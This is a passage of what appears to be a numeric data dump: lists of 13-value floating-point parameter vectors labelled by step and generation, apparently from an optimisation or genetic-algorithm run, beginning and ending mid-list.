-1.7639524821935923e-06, \n -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, \n 119478476003.54858]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, \n 119746195767.88297]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, \n 120002114057.9749]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, \n 124495463707.0261]\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, \n 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, \n 127226107362.62663]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, \n 
128048566261.66084]\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, \n 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, \n 129146670219.88675]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, \n 132556338910.10567]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, \n 132653030892.18918]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, \n 140436120253.29218]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, \n 143105235055.60883]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, \n 143860615432.91846]\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 
5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, \n 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, \n 144269444777.14786]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, \n 145085114899.6645]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15,\n 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, \n 145085114900.12366]\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, \n 145590447784.79443]\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, \n 153694065180.84283]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, \n 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15,\n 
7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, \n 154263245256.49524]\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, \n 164710456294.5225]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, \n 170174200265.44513]\n",
"step-4": "one=[7.236287049225701e-06, -1.445911565527231e-12, -1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10, -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10, 135323228000.64511, 130464457208.5385]\ntwo=[6.101651991514008e-06, -1.2764740103418866e-12, -1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05, -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10, 194360719320.3122, 75684271432.82758]\nthree=[6.4442734160126695e-06, -1.2463732938819767e-12, -1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, 40874176708.45886, 129961018217.7445]\nfour=[5.591985036569838e-06, -1.5732644861037622e-12, -1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10, 95538034865.65512, 192689393537.75766]\nfive=[5.9877501684316964e-06, -1.4725222964411265e-12, -2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10, 172629547544.72174, 121012464101.10771]\nsix = [6.525636151737385e-10, -1.5516831882387681e-12, -1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10, -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497686e-05, -1.9757021060346726e-06, -1.5031696163247858e-08, 8.945619840357268e-10, 99871865434.22476, 123933224114.80229]\n\nfirst1_gen= [[6.417695307686038e-06, -1.2416886913890308e-12, -1.791907685050265e-13, 3.983180616117193e-11, 
-7.243488055496258e-11, -1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10, 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11, -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08, 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13, 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10, -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05, -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10, 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11, -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16, 2.2287538734129395e-05, -1.8740196054647742e-06, -1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10, -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05, -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10, 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, -2.5320893657294154e-10, -2.1583737575101563e-15, 3.210132219509301e-16, 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08, 9.214909160927855e-10, 
154168790181.56195, 151975095946.00134], [6.4442734160126695e-06, -1.5732644861037622e-12, -1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10, 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11, -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16, 2.7105518268805634e-05, -1.9663482803776534e-06, -1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10, -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05, -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10, 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11, -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16, 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13, 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15, 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, -1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, 1374938673042.5493, 4524615824537.332], [5.6149092148265474e-06, -1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, -2.335516269047763e-10, 
-2.1416544930348844e-15, 3.3108330528832777e-16, 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13, 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10, 3105580314530.341, 4622017117439.275]]\nsecond1_gen= [[6.473615077297489e-06, -1.2416886913890308e-12, -1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05, -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10, 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11, -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08, 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13, 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06, -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, 440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05, -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, 90541420172.20418, 
503189560104.03455], [6.417695307686038e-06, -1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11, -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08, 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13, 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15, 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10, -1.1298867172210502e-15, 3.273827033054119e-16, 2.71828464025051e-05, -1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11, -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13, 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15, 3.2670998922499434e-16, 2.2375793269713536e-05, -1.8912926681237391e-06, -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -2.0184675219747084e-13, 3.996761820973954e-11, -7.30077645678233e-11, -1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05, -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10, 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11, -2.5212090845365535e-10, -1.1547640084684547e-15, 
3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06, -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11, -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11, -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16, 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08, 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], [6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15, 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06, -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10, -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05, -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10, 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16, 2.5052523082312023e-05, -1.9593459141604013e-06, -1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, 313686240874.89294]]\nthird1_gen= [[6.428534934734018e-06, -1.2348251959432863e-12, -1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10, 35914970214.05617, 
208658422545.5101], [6.449609175276781e-06, -1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11, -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16, 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08, 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13, 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10, 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16, 2.6978084672522227e-05, -1.9285560276423494e-06, -1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, -1.9365154780516644e-06, -1.4736235919210341e-08, 9.02573445716291e-10, 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11, -7.250728822785179e-11, -1.1805107762756462e-15, 3.880180132520679e-16, 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08, 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13, 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15, 
3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05, -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10, 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08, 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13, 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15, 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05, -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -1.436844524248817e-12, -1.766513283684079e-13, 3.940038642964773e-11, -7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16, 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], [6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13, 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15, 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06, -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, 886246867017.2574], 
[6.5292806963971566e-06, -1.2521788644307235e-12, -1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10, 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, -7.177949793819456e-11, -1.1234835849356116e-15, 3.638627899273496e-16, 2.4725904181789833e-05, -1.7849753358990938e-06, -1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, 3971854766728.4727]]\n\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, 145011267381.10236]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, 138194745977.8172]\n\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, 148499957167.59894]\n\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15, 
9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, 138376625633.08905]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, 147143586736.12967]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]\n\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06, -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, 149819556305.94864]\n\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, 5.0376537605765665e-11, -1.7763084077799175e-10, -1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, 108694336300.90585, 154375559012.27695]\n\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06, -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, 195080915978.15582]\n\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13, 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15, 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, 
143318140783.98648]\n\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, 160453198244.84198]\n\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, 109895891048.79645]\n\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13, 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, 122880053749.32047]\n\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, 130994741061.18477]\n\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, 148716985588.15564]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, 101545825010.15762]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, 
